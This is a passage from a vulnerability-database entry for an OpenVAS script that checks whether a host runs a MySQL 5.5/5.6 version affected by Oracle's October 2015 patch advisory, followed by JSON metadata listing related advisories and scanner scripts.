Oracle MySQL Multiple Unspecified Vulnerabilities-01 Oct15 (Linux)
2016-07-01T00:00:00
ID OPENVAS:1361412562310107018 Type openvas Reporter Copyright (C) 2016 Greenbone Networks GmbH Modified 2020-04-01T00:00:00
Description
This host is running Oracle MySQL and is
prone to multiple unspecified vulnerabilities.
##############################################################################
# OpenVAS Vulnerability Test
#
# Oracle MySQL Multiple Unspecified Vulnerabilities-01 Oct15 (Linux)
#
# Authors:
# Tameem Eissa <tameem.eissa@greenbone.net>
#
# Copyright:
# Copyright (C) 2016 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.107018");
script_version("2020-04-01T10:41:43+0000");
script_cve_id("CVE-2015-4913", "CVE-2015-4830", "CVE-2015-4826", "CVE-2015-4815",
"CVE-2015-4807", "CVE-2015-4802", "CVE-2015-4792", "CVE-2015-4870",
"CVE-2015-4861", "CVE-2015-4858", "CVE-2015-4836");
script_bugtraq_id(77153, 77228, 77237, 77222, 77205, 77165, 77171, 77208, 77137,
77145, 77190);
script_tag(name:"cvss_base", value:"4.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:S/C:N/I:P/A:N");
script_tag(name:"last_modification", value:"2020-04-01 10:41:43 +0000 (Wed, 01 Apr 2020)");
script_tag(name:"creation_date", value:"2016-07-01 12:46:24 +0530 (Fri, 01 Jul 2016)");
script_tag(name:"qod_type", value:"remote_banner_unreliable");
script_name("Oracle MySQL Multiple Unspecified Vulnerabilities-01 Oct15 (Linux)");
script_tag(name:"summary", value:"This host is running Oracle MySQL and is
prone to multiple unspecified vulnerabilities.");
script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");
script_tag(name:"insight", value:"Unspecified errors exists in the MySQL Server
component via unknown vectors related to Server.");
script_tag(name:"impact", value:"Successful exploitation will allow an
authenticated remote attacker to affect confidentiality, integrity, and
availability via unknown vectors.");
script_tag(name:"affected", value:"Oracle MySQL Server 5.5.45 and earlier
and 5.6.26 and earlier on windows");
script_tag(name:"solution", value:"Apply the patch from the referenced advisory.");
script_tag(name:"solution_type", value:"VendorFix");
script_xref(name:"URL", value:"http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html");
script_copyright("Copyright (C) 2016 Greenbone Networks GmbH");
script_category(ACT_GATHER_INFO);
script_family("Databases");
script_dependencies("mysql_version.nasl", "os_detection.nasl");
script_require_ports("Services/mysql", 3306);
script_mandatory_keys("MySQL/installed", "Host/runs_unixoide");
exit(0);
}
include("version_func.inc");
include("host_details.inc");
cpe_list = make_list( "cpe:/a:mysql:mysql", "cpe:/a:oracle:mysql" );
if(!infos = get_app_port_from_list(cpe_list:cpe_list))
exit(0);
cpe = infos["cpe"];
port = infos["port"];
if(!infos = get_app_version_and_location(cpe:cpe, port:port, exit_no_version:TRUE))
exit(0);
vers = infos["version"];
path = infos["location"];
if(vers =~ "^5\.[56]\.")
{
if(version_in_range(version:vers, test_version:"5.5", test_version2:"5.5.45") ||
version_in_range(version:vers, test_version:"5.6", test_version2:"5.6.26"))
{
report = report_fixed_ver(installed_version:vers, fixed_version:"Apply the patch", install_path:path);
security_message(data:report, port:port);
exit(0);
}
}
exit(99);
{"id": "OPENVAS:1361412562310107018", "type": "openvas", "bulletinFamily": "scanner", "title": "Oracle MySQL Multiple Unspecified Vulnerabilities-01 Oct15 (Linux)", "description": "This host is running Oracle MySQL and is\n prone to multiple unspecified vulnerabilities.", "published": "2016-07-01T00:00:00", "modified": "2020-04-01T00:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107018", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html"], "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "lastseen": "2020-04-03T18:54:23", "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2015:2244-1", "OPENSUSE-SU-2015:2246-1", "OPENSUSE-SU-2015:2243-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310842503", "OPENVAS:703385", "OPENVAS:1361412562310703377", "OPENVAS:1361412562311220161011", "OPENVAS:1361412562310131134", "OPENVAS:1361412562310703385", "OPENVAS:1361412562310805764", "OPENVAS:1361412562310851142", "OPENVAS:1361412562310851139", "OPENVAS:703377"]}, {"type": "freebsd", "idList": ["851A0EEA-88AA-11E5-90E7-B499BAEBFEAF"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_851A0EEA88AA11E590E7B499BAEBFEAF.NASL", "OPENSUSE-2015-890.NASL", "MYSQL_5_5_46_RPM.NASL", "DEBIAN_DSA-3377.NASL", "MARIADB_10_0_22.NASL", "OPENSUSE-2016-164.NASL", "SUSE_SU-2016-0296-1.NASL", "MARIADB_5_5_46.NASL", "SUSE_SU-2016-0121-1.NASL", "OPENSUSE-2015-884.NASL"]}, {"type": "archlinux", "idList": ["ASA-201510-26"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3377-1:D5B01", "DEBIAN:DSA-3385-1:73003"]}, {"type": "cve", "idList": ["CVE-2015-4792", "CVE-2015-4830", "CVE-2015-4807", "CVE-2015-4858", "CVE-2015-4815", "CVE-2015-4802", "CVE-2015-4861", "CVE-2015-4826", "CVE-2015-4870", "CVE-2015-4836"]}, {"type": "f5", "idList": ["SOL59010802", "F5:K86326526", "F5:K59010802", "SOL86326526"]}, {"type": "symantec", "idList": ["SMNTC-1341"]}, {"type": "ubuntu", "idList": ["USN-2781-1"]}, {"type": "redhat", "idList": ["RHSA-2016:22610", "RHSA-2016:0705", "RHSA-2016:1132", "RHSA-2016:0534", "RHSA-2016:1481", "RHSA-2016:1480"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-0534"]}, {"type": "centos", "idList": ["CESA-2016:0534"]}, {"type": "fedora", "idList": ["FEDORA:B323460B0848", "FEDORA:0994E61361B1", "FEDORA:2C4E6617FD66", "FEDORA:9EA6660762B4"]}, {"type": "amazon", "idList": ["ALAS-2016-684"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:4856CE5DA621AD64273C51D5420971CA"]}, {"type": "exploitdb", "idList": ["EDB-ID:39867"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:137232"]}, {"type": "zdt", "idList": ["1337DAY-ID-26031"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14755"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2015-2367953", "ORACLE:CPUOCT2015"]}], "modified": "2020-04-03T18:54:23", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2020-04-03T18:54:23", "rev": 2}, "vulnersScore": 6.4}, "pluginID": "1361412562310107018", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle MySQL Multiple Unspecified Vulnerabilities-01 Oct15 (Linux)\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107018\");\n script_version(\"2020-04-01T10:41:43+0000\");\n script_cve_id(\"CVE-2015-4913\", \"CVE-2015-4830\", \"CVE-2015-4826\", \"CVE-2015-4815\",\n \"CVE-2015-4807\", \"CVE-2015-4802\", \"CVE-2015-4792\", \"CVE-2015-4870\",\n \"CVE-2015-4861\", \"CVE-2015-4858\", \"CVE-2015-4836\");\n script_bugtraq_id(77153, 77228, 77237, 77222, 77205, 77165, 77171, 77208, 77137,\n 77145, 77190);\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-04-01 10:41:43 +0000 (Wed, 01 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-07-01 12:46:24 +0530 (Fri, 01 Jul 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Oracle MySQL Multiple Unspecified Vulnerabilities-01 Oct15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is running Oracle MySQL and is\n prone to multiple unspecified vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Unspecified errors exists in the MySQL Server\n component via unknown vectors related to Server.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n authenticated remote attacker to affect confidentiality, integrity, and\n availability via unknown vectors.\");\n\n script_tag(name:\"affected\", value:\"Oracle MySQL Server 5.5.45 and earlier\n and 5.6.26 and earlier on windows\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Databases\");\n script_dependencies(\"mysql_version.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/mysql\", 3306);\n script_mandatory_keys(\"MySQL/installed\", \"Host/runs_unixoide\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\ncpe_list = make_list( \"cpe:/a:mysql:mysql\", \"cpe:/a:oracle:mysql\" );\n\nif(!infos = get_app_port_from_list(cpe_list:cpe_list))\n exit(0);\n\ncpe = infos[\"cpe\"];\nport = infos[\"port\"];\n\nif(!infos = get_app_version_and_location(cpe:cpe, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(vers =~ \"^5\\.[56]\\.\")\n{\n if(version_in_range(version:vers, test_version:\"5.5\", test_version2:\"5.5.45\") ||\n version_in_range(version:vers, test_version:\"5.6\", test_version2:\"5.6.26\"))\n {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"Apply the patch\", install_path:path);\n security_message(data:report, port:port);\n exit(0);\n }\n}\n\nexit(99);\n", "naslFamily": "Databases"}
{"freebsd": [{"lastseen": "2019-05-29T18:32:59", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "\nOracle reports:\n\nCritical Patch Update: MySQL Server, version(s) 5.5.45 and prior, 5.6.26 and prior\n\n", "edition": 4, "modified": "2015-11-10T00:00:00", "published": "2015-11-10T00:00:00", "id": "851A0EEA-88AA-11E5-90E7-B499BAEBFEAF", "href": "https://vuxml.freebsd.org/freebsd/851a0eea-88aa-11e5-90e7-b499baebfeaf.html", "title": "MySQL - Multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}], "openvas": [{"lastseen": "2020-01-31T18:37:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-12-11T00:00:00", "id": "OPENVAS:1361412562310851139", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851139", "type": "openvas", "title": "openSUSE: Security Advisory for Security (openSUSE-SU-2015:2244-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851139\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-12-11 05:48:10 +0100 (Fri, 11 Dec 2015)\");\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4807\", \"CVE-2015-4815\",\n \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\", \"CVE-2015-4858\",\n \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4913\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for Security (openSUSE-SU-2015:2244-1)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Security'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"MariaDB was updated to 10.0.22 to fix security issues and bugs.\n\n The following vulnerabilities were fixed in the upstream release:\n\n CVE-2015-4802, CVE-2015-4807, CVE-2015-4815, CVE-2015-4826,\n CVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861, CVE-2015-4870,\n CVE-2015-4913, CVE-2015-4792\n\n A list of upstream changes and release notes can be found at the referenced notes.\n\n The following build problems were fixed:\n\n * bsc#937787: fix main.bootstrap test (change default charset to utf8 in\n test result)\");\n\n script_tag(name:\"affected\", value:\"Security on openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"openSUSE-SU\", value:\"2015:2244-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n\n script_xref(name:\"URL\", value:\"https://kb.askmonty.org/en/mariadb-10022-release-notes/\");\n script_xref(name:\"URL\", value:\"https://kb.askmonty.org/en/mariadb-10022-changelog/\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient-devel\", rpm:\"libmysqlclient-devel~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient18\", rpm:\"libmysqlclient18~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient18-debuginfo\", rpm:\"libmysqlclient18-debuginfo~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient_r18\", rpm:\"libmysqlclient_r18~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqld-devel\", rpm:\"libmysqld-devel~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqld18\", rpm:\"libmysqld18~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqld18-debuginfo\", rpm:\"libmysqld18-debuginfo~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb\", rpm:\"mariadb~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-bench\", rpm:\"mariadb-bench~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-bench-debuginfo\", rpm:\"mariadb-bench-debuginfo~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-client\", rpm:\"mariadb-client~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-client-debuginfo\", rpm:\"mariadb-client-debuginfo~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-debuginfo\", rpm:\"mariadb-debuginfo~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-debugsource\", rpm:\"mariadb-debugsource~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-errormessages\", rpm:\"mariadb-errormessages~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-test\", rpm:\"mariadb-test~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-test-debuginfo\", rpm:\"mariadb-test-debuginfo~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-tools\", rpm:\"mariadb-tools~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mariadb-tools-debuginfo\", rpm:\"mariadb-tools-debuginfo~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient18-32bit\", rpm:\"libmysqlclient18-32bit~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient18-debuginfo-32bit\", rpm:\"libmysqlclient18-debuginfo-32bit~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient_r18-32bit\", rpm:\"libmysqlclient_r18-32bit~10.0.22~2.18.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2020-04-03T18:54:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "This host is running Oracle MySQL and is\n prone to multiple unspecified vulnerabilities.", "modified": "2020-04-01T00:00:00", "published": "2015-10-28T00:00:00", "id": "OPENVAS:1361412562310805764", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805764", "type": "openvas", "title": "Oracle MySQL Multiple Unspecified Vulnerabilities-01 Oct15 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle MySQL Multiple Unspecified Vulnerabilities-01 Oct15 (Windows)\n#\n# Authors:\n# Deependra Bapna <bdeependra@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805764\");\n script_version(\"2020-04-01T10:41:43+0000\");\n script_cve_id(\"CVE-2015-4913\", \"CVE-2015-4830\", \"CVE-2015-4826\", \"CVE-2015-4815\",\n \"CVE-2015-4807\", \"CVE-2015-4802\", \"CVE-2015-4792\", \"CVE-2015-4870\",\n \"CVE-2015-4861\", \"CVE-2015-4858\", \"CVE-2015-4836\");\n script_bugtraq_id(77153, 77228, 77237, 77222, 77205, 77165, 77171, 77208, 77137,\n 77145, 77190);\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-04-01 10:41:43 +0000 (Wed, 01 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-28 13:07:06 +0530 (Wed, 28 Oct 2015)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Oracle MySQL Multiple Unspecified Vulnerabilities-01 Oct15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is running Oracle MySQL and is\n prone to multiple unspecified vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Unspecified errors exists in the MySQL Server\n component via unknown vectors related to Server.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n authenticated remote attacker to affect confidentiality, integrity, and\n availability via unknown vectors.\");\n\n script_tag(name:\"affected\", value:\"Oracle MySQL Server 5.5.45 and earlier\n and 5.6.26 and earlier on windows\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Databases\");\n script_dependencies(\"mysql_version.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/mysql\", 3306);\n script_mandatory_keys(\"MySQL/installed\", \"Host/runs_windows\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\ncpe_list = make_list( \"cpe:/a:mysql:mysql\", \"cpe:/a:oracle:mysql\" );\n\nif(!infos = get_app_port_from_list(cpe_list:cpe_list))\n exit(0);\n\ncpe = infos[\"cpe\"];\nport = infos[\"port\"];\n\nif(!infos = get_app_version_and_location(cpe:cpe, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(vers =~ \"^5\\.[56]\\.\")\n{\n if(version_in_range(version:vers, test_version:\"5.5\", test_version2:\"5.5.45\") ||\n version_in_range(version:vers, test_version:\"5.6\", test_version2:\"5.6.26\"))\n {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"Apply the patch\", install_path:path);\n security_message(data:report, port:port);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2020-01-31T18:37:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-12-11T00:00:00", "id": "OPENVAS:1361412562310851142", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851142", "type": "openvas", "title": "openSUSE: Security Advisory for Security (openSUSE-SU-2015:2246-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851142\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-12-11 05:51:25 +0100 (Fri, 11 Dec 2015)\");\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4807\", \"CVE-2015-4815\",\n \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\", \"CVE-2015-4858\",\n \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4913\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for Security (openSUSE-SU-2015:2246-1)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Security'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"MariaDB was updated to 5.5.46 to fix security issues and bugs.\n\n The following vulnerabilities were fixed in the upstream release:\n\n CVE-2015-4802, CVE-2015-4807, CVE-2015-4815, CVE-2015-4826,\n CVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861, CVE-2015-4870,\n CVE-2015-4913, CVE-2015-4792\n\n A list of upstream changes and release notes can be found at the linked references.\");\n\n script_xref(name:\"URL\", value:\"https://mariadb.com/kb/en/mariadb/mariadb-5546-release-notes/\");\n script_xref(name:\"URL\", value:\"https://mariadb.com/kb/en/mariadb/mariadb-5546-changelog/\");\n\n script_tag(name:\"affected\", value:\"Security on openSUSE 13.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"openSUSE-SU\", value:\"2015:2246-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclient-devel\", rpm:\"libmysqlclient-devel~5.5.46~13.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = 